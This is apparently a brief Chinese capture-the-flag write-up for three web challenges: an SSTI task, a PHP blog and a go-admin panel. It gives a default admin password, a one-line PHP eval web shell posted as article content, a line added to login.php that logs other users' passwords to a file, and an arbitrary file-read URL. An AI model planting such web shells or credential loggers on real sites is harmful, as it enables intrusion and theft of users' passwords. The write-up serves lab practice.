FinalHgame wp

ssti

常规的ssti

php-blog

admin 12345
进入后台，发一篇文章，
内容填<?php eval($_POST['pass']);
直接getshell
然后在login.php里面加一句
file_put_contents('login.txt',$username." ".$password);
记录一下另一个用户的密码

go-admin

进后台翻来翻去发现一个读文件的接口
/showimage?imgname=/flag直接读到flag